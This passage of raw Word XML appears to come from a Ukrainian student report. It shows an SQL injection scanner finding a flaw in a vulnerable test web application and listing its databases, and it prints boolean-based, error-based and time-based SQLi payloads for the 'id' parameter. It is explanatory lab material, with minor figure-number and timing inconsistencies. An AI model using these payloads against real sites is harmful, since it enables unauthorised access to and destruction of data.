          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>з параметрів і визначив чи вразливий даний параметр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE74EE5" w14:textId="77777777" w:rsidR="0098124E" w:rsidRDefault="00A719C8" w:rsidP="00A719C8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Якщо параметр виявився вразливим то сканер відразу витягує корисну інформацію з бази даних рис. 3.8. В нашому випадку сканер отримав список баз даних використання даної інформації може допомогти в подальшому розвитку атаки, тому що в базах даних зазвичай зберігаються різні дані про користувачів і їхні паролі. Якщо зловмисник отримує таку інформацію він може використати її для руйнування бізнесу. Зловмисник може продати базу даних конкурентам, які можуть скористатися нею або просто видалити всі дані з бази використовуючи дану вразливість.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E846E46" w14:textId="093BA2F5" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="0098124E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="559EB876" wp14:editId="135E805F">
            <wp:extent cx="5630296" cy="2710580"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="139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37162" cy="2713885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75554126" w14:textId="5192B569" w:rsidR="00A719C8" w:rsidRDefault="00A719C8" w:rsidP="00A719C8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отримання списку баз даних</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446661F" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRPr="008016C0" w:rsidRDefault="00101F0F" w:rsidP="00A719C8">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371F62E1" w14:textId="057E00E7" w:rsidR="00A719C8" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Отже, база даних вразлива до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00584480">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">і сканер знаходить її наступним чином </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(жирним буде виділено те що сканер додає в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>запит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> до БД</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5598F" w14:textId="12327D56" w:rsidR="00584480" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Початковий вигляд вразливого веб-додатку (рис. 3.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FEFB5F" w14:textId="606F0A5F" w:rsidR="00584480" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EC635ED" wp14:editId="767AF0EB">
            <wp:extent cx="4798771" cy="3146734"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="158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50387" cy="3180580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB33EF2" w14:textId="0AA098DC" w:rsidR="00584480" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B81526">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81526">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вигляд сайту до введення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14DA8E" w14:textId="77777777" w:rsidR="00584480" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE6C0BE" w14:textId="77777777" w:rsidR="00FC57FB" w:rsidRPr="00FC57FB" w:rsidRDefault="00584480" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FC57FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2D6D3" w14:textId="36FBC246" w:rsidR="00FC57FB" w:rsidRPr="005027FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?id=</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' or 1=1 -- -&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01096B61" w14:textId="77777777" w:rsidR="00584480" w:rsidRPr="005027FB" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6169139F" w14:textId="4C778087" w:rsidR="00584480" w:rsidRPr="00D84A48" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F8AA1D9" wp14:editId="07ED517C">
            <wp:extent cx="4942382" cy="2440936"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="171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98177" cy="2468492"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17229B20" w14:textId="4A436A68" w:rsidR="00584480" w:rsidRDefault="00584480" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00FC57FB">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756003C" w14:textId="77777777" w:rsidR="00FC57FB" w:rsidRDefault="00FC57FB" w:rsidP="00584480">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C829043" w14:textId="2A201FA3" w:rsidR="00FC57FB" w:rsidRPr="00FC57FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис. 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116A2C0" w14:textId="73CF6B3D" w:rsidR="0098124E" w:rsidRPr="0098124E" w:rsidRDefault="00FC57FB" w:rsidP="0098124E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC57FB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id=</w:t>
      </w:r>
      <w:r w:rsidRPr="00114204">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' OR (SELECT 4168 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (ELT(4168=4168,1))),0x7178717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC57FB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> algW&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689AACA8" w14:textId="28B63538" w:rsidR="00FC57FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E535C1" w14:textId="72CFA5FC" w:rsidR="00FC57FB" w:rsidRPr="00FC57FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022874B1" wp14:editId="2F3193AC">
            <wp:extent cx="6120130" cy="963930"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="266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963930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BF7AB" w14:textId="77777777" w:rsidR="00FC57FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60692AB1" w14:textId="77777777" w:rsidR="00FC57FB" w:rsidRPr="00101F0F" w:rsidRDefault="00FC57FB" w:rsidP="00101F0F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABADFE9" w14:textId="47D057F7" w:rsidR="00FC57FB" w:rsidRPr="00114204" w:rsidRDefault="00FC57FB" w:rsidP="00114204">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис. 3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCFD2B2" w14:textId="321BED55" w:rsidR="00FC57FB" w:rsidRPr="005027FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id=</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00114204" w:rsidRPr="00114204">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AND (SELECT 9130 FROM (SELECT(SLEEP(5)))YAiZ)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sOzI&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D28D184" w14:textId="2012DBA3" w:rsidR="00114204" w:rsidRDefault="00114204" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">На рис. 3.10 представлено час очікування звичайної відповіді від сервера в той час на рис. 3.11 збільшено час завантаження додатку, тому що БД отримала команду зачекати 20 секунд. Це яскравий приклад того, що параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00114204">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">вразливий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80CC77" w14:textId="77777777" w:rsidR="0098124E" w:rsidRPr="0098124E" w:rsidRDefault="0098124E" w:rsidP="0098124E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75441F8B" w14:textId="2A171FFC" w:rsidR="00FC57FB" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
